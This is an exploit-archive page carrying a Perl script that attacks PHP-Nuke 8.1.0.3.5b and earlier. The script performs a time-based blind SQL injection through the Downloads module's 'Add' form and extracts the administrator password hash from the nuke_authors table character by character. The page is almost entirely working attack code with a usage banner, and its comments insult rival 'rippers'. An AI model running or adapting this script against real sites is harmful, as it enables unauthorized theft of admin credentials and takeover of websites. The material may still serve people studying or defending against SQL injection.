what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PHP-Nuke 8.1.0.3.5b Downloads Remote Blind SQL Injection

PHP-Nuke 8.1.0.3.5b Downloads Remote Blind SQL Injection
Posted Nov 23, 2011
Authored by Dante90 | Site warwolfz.org

PHP-Nuke versions 8.1.0.3.5b and below remote blind SQL injection exploit.

tags | exploit, remote, php, sql injection
SHA-256 | 7cde33d09b6ccc42ca4062bdaa24da7a1f5dd385c5adba8ff2cb59d9519665f3

PHP-Nuke 8.1.0.3.5b Downloads Remote Blind SQL Injection

Change Mirror Download
#!/usr/bin/perl
# [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit
# Date: 2010.07.04 after 50 days the bug was discovered.
# Author/s: Dante90, WaRWolFz Crew
# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770,
# Shades Master, V1R5, yeat
# Special Greetings To: The:Paradox
# Greetings To: Shotokan-The Hacker, _mRkZ_, h473
# Web Site: www.warwolfz.org
# My Wagend (Dante90): dante90wwz.altervista.org
# ----
# Why have I decided to publish this?
# Because some nice guys (Dr.0rYX and Cr3w-DZ) have ripped and published
# my own exploit, with their names.
# FUCKING LAMERS / RIPPERS / SCRIPT KIDDIE
# ----

use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Headers;
use Time::HiRes;

my $Victime = shift or &usage;
my $Hash = "";
my ($Referer,$Time,$Response);
my ($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Method = HTTP::Request->new(POST => $HostName.'modules.php?name=Downloads&d_op=Add');
my $Cookies = new HTTP::Cookies;
my $UserAgent = new LWP::UserAgent(
agent => 'Mozilla/5.0',
max_redirect => 0,
cookie_jar => $Cookies,
default_headers => HTTP::Headers->new,
) or die $!;
my $WaRWolFz = "http://www.warwolfz.org/";
my $DefaultTime = request($WaRWolFz);
my $Post;

sub Blind_SQL_Jnjection {
my ($dec,$hex,$Victime) = @_;
return "http://www.warwolfz.org/' UNION/**/SELECT IF(SUBSTRING(pwd,${dec},1)=CHAR(${hex}),benchmark(250000000,CHAR(0)),0) FROM nuke_authors WHERE aid='${Victime}";
}

for(my $I=1; $I<=32; $I++){ #N Hash characters
for(my $J=0; $J<=15; $J++){ #0 -> F
$Post = Blind_SQL_Jnjection($I,$chars[$J],$Victime);
$Time = request($Post);
sleep(3);
refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);
if ($Time > 4) {
$Time = request($Post);
refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);
if ($Time > 4) {
syswrite(STDOUT,chr($chars[$J]));
$Hash .= chr($chars[$J]);
$Time = request($Post);
refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);
last;
}
}
}
if($I == 1 && length $Hash < 1 && !$Hash){
print " * Exploit Failed *\n";
print " -------------------------------------------------------- \n";
exit;
}
if($I == 32){
print " * Exploit Successfully Executed *\n";
print " -------------------------------------------------------- \n";
system("pause");
}
}

sub request{
$Post = $_[0];
$Start = Time::HiRes::time();
my $Response = $UserAgent->post($HostName.'modules.php?name=Downloads&d_op=Add', {
title => "Dante90",
url => $Post,
description => "WaRWolFz Crew",
auth_name => "Dante90",
email => "dante90.dmc4\@hotmail.it",
filesize => "1024",
version => "1",
homepage => "http://www.warwolfz.org/",
d_op => "Add"
},
Referer => $HostName.'modules.php?name=Downloads&d_op=Add');
$Response->is_success() or die "$HostName : ", $Response->message, "\n";
$End = Time::HiRes::time();
$Time = $End - $Start;
return $Time;
}

sub usage {
system("cls");
{
print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit\n";
print " -------------------------------------------------------- \n";
print " * USAGE: *\n";
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
print " * perl name_exploit.pl [victime] *\n";
print " -------------------------------------------------------- \n";
print " * Powered By Dante90, WaRWolFz Crew *\n";
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
print " ------------------------------------------------------- \n";
};
exit;
}

sub refresh {
system("cls");
{
print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit\n";
print " -------------------------------------------------------- \n";
print " * USAGE: *\n";
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
print " * perl name_exploit.pl [victime] *\n";
print " -------------------------------------------------------- \n";
print " * Powered By Dante90, WaRWolFz Crew *\n";
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
print " ------------------------------------------------------- \n";
};
print " * Victime Site: " . $_[0] . "\n";
print " * Default Time: " . $_[1] . " seconds\n";
print " * BruteForcing Hash: " . chr($_[2]) . "\n";
print " * BruteForcing N Char Hash: " . $_[5] . "\n";
print " * SQL Time: " . $_[4] . " seconds\n";
print " * Hash: " . $_[3] . "\n";
}

#WaRWolFz Crew
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close